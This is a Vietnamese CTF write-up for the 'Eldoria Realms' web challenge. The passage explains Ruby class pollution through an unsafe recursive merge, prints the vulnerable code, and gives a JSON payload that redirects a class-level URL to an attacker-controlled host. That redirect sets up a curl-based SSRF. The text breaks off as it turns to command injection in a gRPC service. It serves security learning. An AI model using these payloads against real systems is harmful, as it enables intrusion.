<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="taneora,web,security,ctf,writeups">
    
    <meta name="author" content="Taneora">
    
    <!-- Completely eliminate flash of wrong theme -->
    <script>
        (function() {
            const THEME_KEY = "REDEFINE-THEME-STATUS";
            const DARK = "dark", LIGHT = "light";
            
            // Get preferred theme
            function getTheme() {
                try {
                    const saved = localStorage.getItem(THEME_KEY);
                    if (saved) {
                        const { isDark } = JSON.parse(saved);
                        return isDark ? DARK : LIGHT;
                    }
                } catch (e) {}
                
                return matchMedia("(prefers-color-scheme: dark)").matches ? DARK : LIGHT;
            }
            
            // Apply theme to document
            function applyTheme(theme) {
                const isDark = theme === DARK;
                const root = document.documentElement;
                
                // Set classes for compatibility
                root.classList.add(theme);
                root.classList.remove(isDark ? LIGHT : DARK);
                root.style.colorScheme = theme;
            }
            
            // Initial application
            const theme = getTheme();
            applyTheme(theme);
            
            // Listen for system preference changes
            matchMedia("(prefers-color-scheme: dark)").addEventListener("change", ({ matches }) => {
                // Only update if using system preference (no localStorage entry)
                if (!localStorage.getItem(THEME_KEY)) {
                    applyTheme(matches ? DARK : LIGHT);
                }
            });
            
            // Set body classes ASAP (before DOMContentLoaded)
            (function() {
                const addBodyClass = () => {
                    const b = document.body;
                    if (!b) return false;
                    b.classList.add(theme + "-mode");
                    return true;
                };

                // Try immediately
                if (addBodyClass()) return;

                // Observe until body exists
                const mo = new MutationObserver(() => {
                    if (addBodyClass()) mo.disconnect();
                });
                mo.observe(document.documentElement, { childList: true, subtree: true });
            })();
        })();
    </script>
    
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://dungnhvhust.github.io/2025/03/28/eldoria-realms/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/taneora.jpg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/taneora.jpg">
    <meta name="theme-color" content="#9af5f0">
    <link rel="shortcut icon" href="/images/taneora.jpg">
    <!--- Page Info-->
    
    <title>
        
            Eldoria Realms | Taneora&#39;s Blog
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
        <link href="https://fonts.googleapis.com/css2?family=Josefin+Sans&display=swap" rel="stylesheet">
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"dungnhvhust.github.io","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":["pentester"]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":false,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#9af5f0","secondary":null,"default_mode":"dark"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":true,"family":"Josefin Sans","url":"https://fonts.googleapis.com/css2?family=Josefin+Sans&display=swap"},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":"Taneora's blog"},"side_tools":{"gear_rotation":true,"auto_expand":false},"open_graph":{"enable":false,"image":"/images/taneora.jpg","description":"I'm Taneora, Offensive Security Expert (Gonna be - Wanna be)?!.","title":"Taneora's blog"},"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/malta_light.png","dark":"/images/malta_dark.png"},"title":"Hi, I'm Taneora.","subtitle":{"text":null,"hitokoto":{"enable":false,"show_author":true,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"0rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"style":"default","links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null,"facebook":"https://www.facebook.com/dung.nhv/"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"11.4.1"}},"version":"2.8.5","navbar":{"auto_hide":true,"color":{"left":"#f78736","right":"#367df7","transparency":10},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"LS":{"path":"/archives","icon":"fa-regular fa-archive"},"Tags":{"icon":"fa-solid fa-tags","path":"/tags"},"About":{"icon":"fa-regular fa-user","submenus":{"Me":"/about","Github":"https://github.com/dungnhvhust","Blog":"https://dungnhvhust.github.io"}}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"right","first_item":"menu","announcement":"Welcome to my blog site.","show_on_mobile":true,"links":{"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Tags":{"path":"/tags","icon":"fa-regular fa-tags"},"Categories":{"path":"/categories","icon":"fa-regular fa-folder"}}},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2025/9/12 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
        
<link rel="stylesheet" href="/fontawesome/duotone.min.css">

    
    
<meta name="generator" content="Hexo 8.1.1"></head>



<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                Taneora&#39;s Blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    LS
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/tags"
                                        >
                                    <i class="fa-solid fa-tags fa-fw"></i>
                                    TAGS
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown"
                                   href="#"
                                        onClick=&#34;return false;&#34;>
                                    <i class="fa-regular fa-user fa-fw"></i>
                                    ABOUT
                                    <i class="fa-solid fa-chevron-down fa-fw"></i>
                                </a>

                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                        
                                            <li>
                                                <a href="/about">
                                                    ME
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://github.com/dungnhvhust">
                                                    GITHUB
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a href="https://dungnhvhust.github.io">
                                                    BLOG
                                                </a>
                                            </li>
                                        
                                    </ul>
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                LS
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/tags"
                        >
                            <span>
                                TAGS
                            </span>
                            
                                <i class="fa-solid fa-tags fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item-sub text-base my-1.5 flex flex-col w-full">
                        
                        <div class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary cursor-pointer text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                             navbar-data-toggle="submenu-About"
                        >
                            <span>
                                ABOUT
                            </span>
                            
                                <i class="fa-solid fa-chevron-right fa-sm fa-fw transition-all"></i>
                            
                        </div>
                        

                        
                            <div class="flex-col items-start px-2 py-2 hidden" data-target="submenu-About">
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           href="/about">ME</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://github.com/dungnhvhust">GITHUB</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           href="https://dungnhvhust.github.io">BLOG</a>
                                    </div>
                                
                            </div>
                        
                    </li>
            

            
            
                
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/archives"
                        >
                            <span>Archives</span>
                            <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                        </a>
                    </li>
                
                    
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/categories"
                        >
                            <span>Categories</span>
                            <i class="fa-regular fa-folder fa-sm fa-fw"></i>
                        </a>
                    </li>
                
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">16</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">6</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">11</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			<div class="w-full flex items-center pt-6 justify-start">
				<h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">Eldoria Realms</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
				<img src="/images/taneora.jpg">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">Taneora</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">pentester</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2025-03-28 16:31:06</span>
        <span class="mobile">2025-03-28 16:31:06</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2026-02-04 03:33:24</span>
            <span class="mobile">2026-02-04 03:33:24</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/Cyber-Apocalypse-CTF-2025/">Cyber-Apocalypse-CTF-2025</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/CTF/">CTF</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Web/">Web</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/SSRF/">SSRF</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/gRPC/">gRPC</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Command-Injection/">Command-Injection</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<h1 id="Eldoria-Realms-Web-Challenge"><a href="#Eldoria-Realms-Web-Challenge" class="headerlink" title="Eldoria Realms - Web Challenge"></a>Eldoria Realms - Web Challenge</h1><blockquote>
<p>Author: tan3ora</p>
</blockquote>
<ul>
<li><strong>Tên:</strong> Eldoria Realms</li>
<li><strong>Description:</strong> A portal that allows players of Eldoria to transport between realms, take on quests, and manage their stats. See if it’s possible to break out of the realm to gather more info on Malakar’s spells inner workings.</li>
<li><strong>Có source code</strong></li>
</ul>
<hr>
<h2 id="Phan-tich"><a href="#Phan-tich" class="headerlink" title="Phân tích"></a>Phân tích</h2><p>Trang web có 2 service : </p>
<ol>
<li>Website viết bằng Ruby</li>
<li><a class="link"   target="_blank" rel="noopener" href="https://viblo.asia/p/co-ban-ve-grpc-va-cach-protobuf-ma-hoa-giu-lieu-trong-grpc-yZjJYzBDLOE" >gRPC Server<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></li>
</ol>
<h3 id="Ruby-class-pollution-qua-gop-de-quy"><a href="#Ruby-class-pollution-qua-gop-de-quy" class="headerlink" title="Ruby class pollution qua gộp đệ quy"></a><strong>Ruby class pollution qua gộp đệ quy</strong></h3><p>Phân tích đoạn code dưới đây ta biết được cách server merge JSON object người dùng nhập vào với object <code>$player</code> đã có:</p>
<div class="code-container" data-rel="Ruby"><figure class="iseeu highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Adventurer</span></span><br><span class="line">	<span class="variable">@@realm_url</span> = <span class="string">&quot;http://eldoria-realm.htb&quot;</span></span><br><span class="line"></span><br><span class="line">	<span class="built_in">attr_accessor</span> <span class="symbol">:name</span>, <span class="symbol">:age</span>, <span class="symbol">:attributes</span></span><br><span class="line"></span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">self</span>.realm_url</span><br><span class="line">		<span class="variable">@@realm_url</span></span><br><span class="line">	<span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">initialize</span>(<span class="params"><span class="symbol">name:</span>, <span class="symbol">age:</span>, <span class="symbol">attributes:</span></span>)</span><br><span class="line">		<span class="variable">@name</span> = name</span><br><span class="line">		<span class="variable">@age</span> = age</span><br><span class="line">		<span class="variable">@attributes</span> = attributes</span><br><span class="line">	<span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">merge_with</span>(<span class="params">additional</span>)</span><br><span class="line">		recursive_merge(<span class="variable language_">self</span>, additional)</span><br><span class="line">	<span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">	<span class="keyword">private</span></span><br><span class="line"></span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">recursive_merge</span>(<span class="params">original, additional, current_obj = original</span>)</span><br><span class="line">    additional.each <span class="keyword">do</span> |<span class="params">key, value</span>|</span><br><span class="line">      <span class="keyword">if</span> value.is_a?(<span class="title class_">Hash</span>)</span><br><span class="line">        <span class="keyword">if</span> current_obj.respond_to?(key)</span><br><span class="line">          next_obj = current_obj.public_send(key)</span><br><span class="line">          recursive_merge(original, value, next_obj)</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">          new_object = <span class="title class_">Object</span>.new</span><br><span class="line">          current_obj.instance_variable_set(<span class="string">&quot;@<span class="subst">#&#123;key&#125;</span>&quot;</span>, new_object)</span><br><span class="line">          current_obj.singleton_class.<span class="built_in">attr_accessor</span> key</span><br><span class="line">        <span class="keyword">end</span></span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">        current_obj.instance_variable_set(<span class="string">&quot;@<span class="subst">#&#123;key&#125;</span>&quot;</span>, value)</span><br><span class="line">        current_obj.singleton_class.<span class="built_in">attr_accessor</span> key</span><br><span class="line">      <span class="keyword">end</span></span><br><span class="line">    <span class="keyword">end</span></span><br><span class="line">    original</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure></div>

<h3 id="Class-pollution-trong-Ruby"><a href="#Class-pollution-trong-Ruby" class="headerlink" title="Class pollution trong Ruby"></a><strong>Class pollution trong Ruby</strong></h3><p>Ruby phụ thuộc rất nhiều vào mô hình lập trình hướng đối tượng. Khi gọi <code>object.singleton_class</code>, hệ thống sẽ tạo ra một lớp ẩn, chỉ dành riêng cho đối tượng đó. Tuy nhiên, nếu thực hiện đệ quy theo cách cho phép truy cập vào các lớp cha, đặc biệt là khi tham chiếu đến <code>superclass</code>  thì có khả năng “leo lên” chuỗi thừa kế. Điều này có thể khiến attacker ghi đè các biến cấp lớp hoặc thậm chí là các biến cấp module.<br>Chi tiết về Class Pollution trong Ruby có thể đọc thêm tại <a class="link"   target="_blank" rel="noopener" href="https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html" >đây<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a>.</p>
<p>Quay lại với bài này,tại endpoint <code>/merge-fates</code> hàm <code>merge_with</code> đã sử dụng <code>recursive_merge()</code>  với input là JSON từ user:</p>
<div class="code-container" data-rel="Ruby"><figure class="iseeu highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">post <span class="string">&quot;/merge-fates&quot;</span> <span class="keyword">do</span></span><br><span class="line">    content_type <span class="symbol">:json</span></span><br><span class="line">    json_input = <span class="variable constant_">JSON</span>.parse(request.body.read)</span><br><span class="line">    random_attributes = &#123;</span><br><span class="line">        <span class="string">&quot;class&quot;</span> =&gt; [<span class="string">&quot;Warrior&quot;</span>, <span class="string">&quot;Mage&quot;</span>, <span class="string">&quot;Rogue&quot;</span>, <span class="string">&quot;Cleric&quot;</span>].sample,</span><br><span class="line">        <span class="string">&quot;guild&quot;</span> =&gt; [<span class="string">&quot;The Unbound&quot;</span>, <span class="string">&quot;Order of the Phoenix&quot;</span>, <span class="string">&quot;The Fallen&quot;</span>, <span class="string">&quot;Guardians of the Realm&quot;</span>].sample,</span><br><span class="line">        <span class="string">&quot;location&quot;</span> =&gt; &#123;</span><br><span class="line">            <span class="string">&quot;realm&quot;</span> =&gt; <span class="string">&quot;Eldoria&quot;</span>,</span><br><span class="line">            <span class="string">&quot;zone&quot;</span> =&gt; [<span class="string">&quot;Twilight Fields&quot;</span>, <span class="string">&quot;Shadow Woods&quot;</span>, <span class="string">&quot;Crystal Caverns&quot;</span>, <span class="string">&quot;Flaming Peaks&quot;</span>].sample</span><br><span class="line">        &#125;,</span><br><span class="line">        <span class="string">&quot;inventory&quot;</span> =&gt; []</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="variable">$player</span> = <span class="title class_">Player</span>.new(</span><br><span class="line">        <span class="symbol">name:</span> <span class="string">&quot;Valiant Hero&quot;</span>,</span><br><span class="line">        <span class="symbol">age:</span> <span class="number">21</span>,</span><br><span class="line">        <span class="symbol">attributes:</span> random_attributes</span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line">    <span class="variable">$player</span>.merge_with(json_input)</span><br><span class="line">    &#123; </span><br><span class="line">        <span class="symbol">status:</span> <span class="string">&quot;Fates merged&quot;</span>, </span><br><span class="line">        <span class="symbol">player:</span> &#123; </span><br><span class="line">            <span class="symbol">name:</span> <span class="variable">$player</span>.name, </span><br><span class="line">            <span class="symbol">age:</span> <span class="variable">$player</span>.age, </span><br><span class="line">            <span class="symbol">attributes:</span> <span class="variable">$player</span>.attributes </span><br><span class="line">        &#125; </span><br><span class="line">    &#125;.to_json</span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure></div>
<p>Điều quan trọng là <code>recursive_merge</code> sẽ tạo các biến instance mới bất cứ khi nào một key không tồn tại. Nó không bao giờ giới hạn các key có thể được gộp. Do vậy ta có thể thao túng thuộc tính của class Object, là class được thừa kế bởi tất cả class khác.<br>Payload:</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  &quot;class&quot;: &#123;</span><br><span class="line">    &quot;superclass&quot;: &#123;</span><br><span class="line">      &quot;realm_url&quot;: &quot;attacker_url&quot;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>
<p>Ta đã thao túng được từ <code>player -&gt; (player&#39;s) class -&gt; (its) superclass -&gt; realm_url</code>,vì vậy mỗi khi gọi <code>Adventurer.realm_url</code> đều sẽ trả về <code>attacker_url</code>.</p>
<p>Khi <code>Adventurer.realm_url</code> bị ghi đè,mỗi khi truy cập <code>/connect-realm</code>  đều sẽ thực hiện lệnh <code>curl</code> đến <code>attacker_url</code>:</p>
<div class="code-container" data-rel="Ruby"><figure class="iseeu highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">get <span class="string">&quot;/connect-realm&quot;</span> <span class="keyword">do</span></span><br><span class="line">    content_type <span class="symbol">:json</span></span><br><span class="line">    <span class="keyword">if</span> <span class="title class_">Adventurer</span>.respond_to?(<span class="symbol">:realm_url</span>)</span><br><span class="line">        realm_url = <span class="title class_">Adventurer</span>.realm_url</span><br><span class="line">        <span class="keyword">begin</span></span><br><span class="line">            uri = <span class="variable constant_">URI</span>.parse(realm_url)</span><br><span class="line">            stdout, stderr, status = <span class="title class_">Open3</span>.capture3(<span class="string">&quot;curl&quot;</span>, <span class="string">&quot;-o&quot;</span>, <span class="string">&quot;/dev/null&quot;</span>, <span class="string">&quot;-w&quot;</span>, <span class="string">&quot;%&#123;http_code&#125;&quot;</span>, uri)</span><br><span class="line">            &#123; <span class="symbol">status:</span> <span class="string">&quot;HTTP request made&quot;</span>, <span class="symbol">realm_url:</span> realm_url, <span class="symbol">response_body:</span> stdout &#125;.to_json</span><br><span class="line">        <span class="keyword">rescue</span> <span class="variable constant_">URI</span><span class="symbol">:</span><span class="symbol">:InvalidURIError</span> =&gt; e</span><br><span class="line">            &#123; <span class="symbol">status:</span> <span class="string">&quot;Invalid URL: <span class="subst">#&#123;e.message&#125;</span>&quot;</span>, <span class="symbol">realm_url:</span> realm_url &#125;.to_json</span><br><span class="line">        <span class="keyword">end</span></span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        &#123; <span class="symbol">status:</span> <span class="string">&quot;Failed to access realm URL&quot;</span> &#125;.to_json</span><br><span class="line">    <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure></div>

<h3 id="Curl-Gopher-SSRF-gRPC"><a href="#Curl-Gopher-SSRF-gRPC" class="headerlink" title="Curl Gopher SSRF -&gt; gRPC"></a><strong>Curl Gopher SSRF -&gt; gRPC</strong></h3><p>Ở gRPC server cung cấp cho chúng ta 2 phương thức. Trong phương thức <code>CheckHealth()</code> tồn tại lỗ hổng OS Command Injection: </p>
